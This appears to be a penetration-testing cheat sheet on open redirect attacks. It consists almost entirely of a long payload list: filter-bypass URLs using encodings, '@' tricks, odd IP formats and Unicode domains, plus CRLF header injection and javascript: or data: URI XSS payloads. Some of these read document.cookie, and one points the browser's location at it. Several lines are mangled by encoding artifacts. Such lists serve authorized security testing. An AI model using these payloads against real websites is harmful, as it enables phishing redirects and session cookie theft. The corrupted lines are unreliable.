Open Redirect

Open redirect
Exploitation
Using a whitelisted domain or keyword
1
www.whitelisted.com.evil.com redirect to evil.com
2
https://www.target01.com//example.com/ redirect to //example.com/
3
https://www.target01.com%09.example.com redirect to example.com
4
https://www.target01.com%252e.example.com redirect to example.com
Copied!
Using "//" to bypass "http" blacklisted keyword
1
//google.com
Copied!
Using "https:" to bypass "//" blacklisted keyword
1
https:google.com
Copied!
Using "//" to bypass "//" blacklisted keyword (Browsers see // as //)
1
\/\/google.com/
2
/\/google.com/
Copied!
Using "/\" to bypass:
1
/\google.com
Copied!
Using "%E3%80%82" to bypass "." blacklisted character
1
//google%E3%80%82com
Copied!
Using null byte "%00" to bypass blacklist filter
1
//google%00.com
Copied!
Using parameter pollution
1
?next=whitelisted.com&next=google.com
Copied!
Using "@" character, browser will redirect to anything after the "@"
1
http://[email protected]/
Copied!
Creating folder as their domain
1
http://www.yoursite.com/http://www.theirsite.com/
2
http://www.yoursite.com/folder/www.folder.com
Copied!
XSS from Open URL - If it's in a JS variable
1
";alert(0);//
Copied!
XSS from data:// wrapper
1
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
Copied!
Username
1
https://[email protected]
2
https://www.victim.co%[email protected]
3
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)[email protected]
Copied!
IP formats
1
216.58.215.78 -- Regular
2
3627734862 -- Decimal
3
0330.0072.0327.0116 -- Octal
4
00000330.00000072.00000327.00000116 -- Octal with junk zeros
5
0xd83ad74e -- Hex
6
0xd8.0x3a.0xd7.0x4e -- Hex (dot sepparated)
7
0x000000d8.0x0000003a.0x000000d7.0x0000004e -- Hex (dot sepparated) with junk zeros
Copied!
You can also mix the different IP formats:
You can play with the different IP formats in https://www.silisoftware.com/tools/ipconverter.php​
Parsing
1
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
2
List:
3
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
4
⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
5
⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
6
⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
7
Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
8
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
Copied!
Open Redirect to XSS
1
#Basic payload, javascript code is executed after "javascript:"
2
javascript:alert(1)
3
​
4
#Bypass "javascript" word filter with CRLF
5
java%0d%0ascript%0d%0a:alert(0)
6
​
7
#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
8
#This bypasses FILTER_VALIDATE_URL os PHP
9
javascript://%250Aalert(1)
10
​
11
#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
12
javascript://%250Aalert(1)//?1
13
javascript://%250A1?alert(1):0
14
​
15
#Others
16
%09Jav%09ascript:alert(document.domain)
17
javascript://%250Alert(document.location=document.cookie)
18
/%09/javascript:alert(1);
19
/%09/javascript:alert(1)
20
//%5cjavascript:alert(1);
21
//%5cjavascript:alert(1)
22
/%5cjavascript:alert(1);
23
/%5cjavascript:alert(1)
24
javascript://%0aalert(1)
25
<>javascript:alert(1);
26
//javascript:alert(1);
27
//javascript:alert(1)
28
/javascript:alert(1);
29
/javascript:alert(1)
30
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
31
javascript:alert(1);
32
javascript:alert(1)
33
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
34
javascript:confirm(1)
35
javascript://https://whitelisted.com/?z=%0Aalert(1)
36
javascript:prompt(1)
37
jaVAscript://whitelisted.com//%0d%0aalert(1);//
38
javascript://whitelisted.com?%a0alert%281%29
39
/x:1/:///%01javascript:alert(document.cookie)/
Copied!
More domain bypasses
1
<>//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
2
//;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
3
/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
4
/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
5
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
6
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
7
///\;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
8
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
9
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
10
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
11
//\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
12
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
13
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
14
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
15
/.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
16
/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
17
/〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
18
.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
19
@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
20
\/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
21
〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
22
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00｡Ｐⓦ
23
%01https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
24
%01https://google.com
25
////%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
26
///%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
27
//%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
28
/%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
29
////%09/google.com
30
///%09/google.com
31
//%09/google.com
32
/%09/google.com
33
////%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
34
///%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
35
//%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
36
/%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
37
////%09/[email protected]
38
///%09/[email protected]
39
//%09/[email protected]
40
/%09/[email protected]
41
&%0d%0a1Location:https://google.com
42
\152\141\166\141\163\143\162\151\160\164\072alert(1)
43
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
44
////216.58.214.206
45
///216.58.214.206
46
//216.58.214.206
47
/\216.58.214.206
48
/216.58.214.206
49
216.58.214.206
50
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
51
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
52
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
53
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
54
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
55
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
56
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
57
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
58
%2f216.58.214.206//
59
%2f216.58.214.206
60
%2f216.58.214.206%2f%2f
61
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
62
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
63
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
64
/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
65
//%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
66
/%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
67
%2f$2f216.58.214.206
68
$2f%2f216.58.214.206%2f%2f
69
%2f$2f3627734734
70
$2f%2f3627734734%2f%2f
71
//%2f%2fgoogle.com
72
/%2f%2fgoogle.com
73
$2f%2fgoogle.com
74
%2f$2fgoogle.com
75
$2f%2fgoogle.com%2f%2f
76
%2f3627734734//
77
%2f3627734734
78
%2f3627734734%2f%2f
79
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
80
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
81
%2fgoogle.com//
82
%2fgoogle.com
83
%2fgoogle.com%2f%2f
84
////3627734734
85
///3627734734
86
//3627734734
87
/\3627734734
88
/3627734734
89
3627734734
90
//[email protected]@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
91
//[email protected][email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
92
//[email protected]@google.com/
93
//[email protected][email protected]/
94
////%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
95
///%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
96
//%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
97
/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
98
////%5cgoogle.com
99
///%5cgoogle.com
100
//%5cgoogle.com
101
/%5cgoogle.com
102
////%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
103
///%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
104
//%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
105
/%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
106
////%[email protected]
107
///%[email protected]
108
//%[email protected]
109
/%[email protected]
110
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
111
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
112
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
113
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ:[email protected]/
114
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ:80#@whitelisted.com/
115
";alert(0);//
116
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
117
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
118
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
119
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
120
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
121
//google%00.com
122
/\google%252ecom
123
google%252ecom
124
<>//google.com
125
/<>//google.com
126
//;@google.com
127
///;@google.com
128
/////google.com/
129
/////google.com
130
////\;@google.com
131
////google.com//
132
////google.com/
133
////google.com
134
///\;@google.com
135
///google.com//
136
///google.com/
137
///google.com
138
//\/google.com/
139
//\google.com
140
//google.com//
141
//google.com/
142
//google.com
143
/.google.com
144
/\/\/google.com/
145
/\/google.com/
146
/\/google.com
147
/\google.com
148
/〱google.com
149
/google.com
150
../google.com
151
.google.com
152
@google.com
153
\/\/google.com/
154
〱google.com
155
google.com
156
google.com%[email protected]
157
////google.com/%2e%2e
158
///google.com/%2e%2e
159
//google.com/%2e%2e
160
/google.com/%2e%2e
161
//google.com/%2E%2E
162
////google.com/%2e%2e%2f
163
///google.com/%2e%2e%2f
164
//google.com/%2e%2e%2f
165
////google.com/%2f..
166
///google.com/%2f..
167
//google.com/%2f..
168
//google.com/%2F..
169
/google.com/%2F..
170
////google.com/%2f%2e%2e
171
///google.com/%2f%2e%2e
172
//google.com/%2f%2e%2e
173
/google.com/%2f%2e%2e
174
//google.com//%2F%2E%2E
175
//google.com:[email protected]/
176
//google.com:80#@whitelisted.com/
177
google.com/.jpg
178
//google.com\twhitelisted.com/
179
//google.com/whitelisted.com
180
//google.com\@whitelisted.com
181
google.com/whitelisted.com
182
//google%E3%80%82com
183
/http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
184
/http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
185
http://;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
186
http://.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
187
http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
188
http:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
189
http://00330.00072.0000326.00000316
190
http:00330.00072.0000326.00000316
191
http://00330.0x3a.54990
192
http:00330.0x3a.54990
193
http://00330.3856078
194
http:00330.3856078
195
http://0330.072.0326.0316
196
http:0330.072.0326.0316
197
http:%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
198
http:%0a%0dgoogle.com
199
http://0xd8.072.54990
200
http:0xd8.072.54990
201
http://0xd8.0x3a.0xd6.0xce
202
http:0xd8.0x3a.0xd6.0xce
203
http://0xd8.3856078
204
http:0xd8.3856078
205
http://0xd83ad6ce
206
http:0xd83ad6ce
207
http://[::216.58.214.206]
208
http:[::216.58.214.206]
209
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ%23.whitelisted.com/
210
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ%2f%2f.whitelisted.com/
211
http://3627734734
212
http:3627734734
213
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ%3F.whitelisted.com/
214
http://[email protected]
215
http:[email protected]
216
http://[email protected]
217
http:[email protected]
218
http://[email protected]
219
http:[email protected]
220
http://[email protected]
221
http:[email protected]
222
http://[email protected]
223
http:[email protected]
224
http://[email protected]
225
http:[email protected]
226
http://[email protected]
227
http:[email protected]
228
http://[email protected]
229
http:[email protected]
230
http://[email protected][::216.58.214.206]
231
http:[email protected][::216.58.214.206]
232
http://[email protected]
233
http:[email protected]
234
http://[email protected]
235
http:[email protected]
236
http://[email protected][::ffff:216.58.214.206]
237
http:[email protected][::ffff:216.58.214.206]
238
http://[email protected]@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
239
http://[email protected][email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
240
http://[email protected]@google.com/
241
http://[email protected][email protected]/
242
http://472.314.470.462
243
http:472.314.470.462
244
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ%5c%5c.whitelisted.com/
245
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
246
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
247
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ:[email protected]/
248
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ:80#@whitelisted.com/
249
http://[::ffff:216.58.214.206]
250
http:[::ffff:216.58.214.206]
251
/http://google.com
252
/http:/google.com
253
http://;@google.com
254
http://.google.com
255
http://google.com
256
http:/\/\google.com
257
http:/google.com
258
http:google.com
259
http://google.com%23.whitelisted.com/
260
http://google.com%2f%2f.whitelisted.com/
261
http://google.com%3F.whitelisted.com/
262
http://google.com%5c%5c.whitelisted.com/
263
http://google.com:[email protected]/
264
http://google.com:80#@whitelisted.com/
265
http://google.com\twhitelisted.com/
266
//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
267
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
268
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
269
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
270
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
271
https:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
272
https://%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
273
/https://%09/google.com
274
https://%09/google.com
275
https://%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
276
https://%09/[email protected]
277
https://%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
278
https://%0a%0dgoogle.com
279
//https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
280
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
281
https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
282
//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
283
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
284
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
285
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
286
/https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
287
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
288
https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
289
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
290
https%3a%2f%2fgoogle.com%2f
291
/https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
292
/https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
293
https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
294
https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
295
/https://%5cgoogle.com
296
/https:/%5cgoogle.com/
297
https://%5cgoogle.com
298
https:/%5cgoogle.com/
299
/https://%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
300
https://%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
301
/https://%[email protected]
302
https://%[email protected]
303
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
304
//https://google.com//
305
/https://google.com//
306
/https://google.com/
307
/https://google.com
308
/https:google.com
309
https://////google.com
310
https://google.com//
311
https://google.com/
312
https://google.com
313
https:/\google.com
314
https:google.com
315
//https:///google.com/%2e%2e
316
/https://google.com/%2e%2e
317
https:///google.com/%2e%2e
318
//https://google.com/%2e%2e%2f
319
https://google.com/%2e%2e%2f
320
/https://google.com/%2f..
321
https://google.com/%2f..
322
/https:///google.com/%2f%2e%2e
323
/https://google.com/%2f%2e%2e
324
https:///google.com/%2f%2e%2e
325
https://google.com/%2f%2e%2e
326
https://:@google.com\@whitelisted.com
327
https://google.com?whitelisted.com
328
https://google.com/whitelisted.com
329
https://google.com\whitelisted.com
330
https://google.com#whitelisted.com
331
https://google%E3%80%82com
332
//https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
333
/https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
334
https://:@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\@whitelisted.com
335
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/whitelisted.com
336
https://whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
337
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ//
338
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
339
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ
340
/https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
341
https:///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e
342
//https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
343
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2e%2e%2f
344
/https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
345
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f..
346
/https:///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
347
/https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
348
https:///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
349
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/%2f%2e%2e
350
//https://[email protected]//
351
/https://[email protected]/
352
https://whitelisted.com;@google.com
353
https://whitelisted.com.google.com
354
https://[email protected]//
355
https://[email protected]/
356
https://[email protected]
357
/https://[email protected]/%2e%2e
358
https:///[email protected]/%2e%2e
359
//https://[email protected]/%2e%2e%2f
360
https://[email protected]/%2e%2e%2f
361
/https://[email protected]/%2f..
362
https://[email protected]/%2f..
363
/https:///[email protected]/%2f%2e%2e
364
/https://[email protected]/%2f%2e%2e
365
https:///[email protected]/%2f%2e%2e
366
https://[email protected]/%2f%2e%2e
367
/https://[email protected]/%2f.//[email protected]/%2f..
368
https://whitelisted.com/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
369
https://whitelisted.com/https://google.com/
370
@https://www.google.com
371
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\twhitelisted.com/
372
http://[email protected]
373
http:[email protected]
374
http://[email protected]
375
http:[email protected]
376
http://[email protected]
377
http:[email protected]
378
http://[email protected]
379
http:[email protected]
380
http://[email protected]
381
http:[email protected]
382
http://[email protected]
383
http:[email protected]
384
http://[email protected]
385
http:[email protected]
386
http://[email protected]
387
http:[email protected]
388
http://[email protected][::216.58.214.206]
389
http:[email protected][::216.58.214.206]
390
http://whitelisted.com%2eⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
391
http://whitelisted.com%2egoogle.com/
392
http://[email protected]
393
http:[email protected]
394
http://[email protected]
395
http:[email protected]
396
http://whitelisted.com:80%40Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
397
http://whitelisted.com:80%40google.com/
398
http://[email protected][::ffff:216.58.214.206]
399
http:[email protected][::ffff:216.58.214.206]
400
http://[email protected]/
401
http://whitelisted.com+&@google.com#[email protected]/
402
http://whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ#[email protected]/
403
http://www.google.com\.whitelisted.com
404
http://www.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ\.whitelisted.com
405
http://XY>.7d8T\[email protected]
406
http:XY>.7d8T\[email protected]
407
http://XY>.7d8T\[email protected]
408
http:XY>.7d8T\[email protected]
409
http://XY>.7d8T\[email protected]
410
http:XY>.7d8T\[email protected]
411
http://XY>.7d8T\[email protected]
412
http:XY>.7d8T\[email protected]
413
http://XY>.7d8T\[email protected]
414
http:XY>.7d8T\[email protected]
415
http://XY>.7d8T\[email protected]
416
http:XY>.7d8T\[email protected]
417
http://XY>.7d8T\[email protected]
418
http:XY>.7d8T\[email protected]
419
http://XY>.7d8T\[email protected]
420
http:XY>.7d8T\[email protected]
421
http://XY>.7d8T\[email protected][::216.58.214.206]
422
http:XY>.7d8T\[email protected][::216.58.214.206]
423
http://XY>.7d8T\[email protected]
424
http:XY>.7d8T\[email protected]
425
http://XY>.7d8T\[email protected]
426
http:XY>.7d8T\[email protected]
427
http://XY>.7d8T\[email protected][::ffff:216.58.214.206]
428
http:XY>.7d8T\[email protected][::ffff:216.58.214.206]
429
http://XY>.7d8T\[email protected]@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
430
http://XY>.7d8T\[email protected][email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ｡Ｐⓦ/
431
http://XY>.7d8T\[email protected]@google.com/
432
http://XY>.7d8T\[email protected][email protected]/
433
ja\nva\tscript\r:alert(1)
434
java%09script:alert(1)
435
java%0ascript:alert(1)
436
java%0d%0ascript%0d%0a:alert(0)
437
java%0dscript:alert(1)
438
Javas%26%2399;ript:alert(1)
439
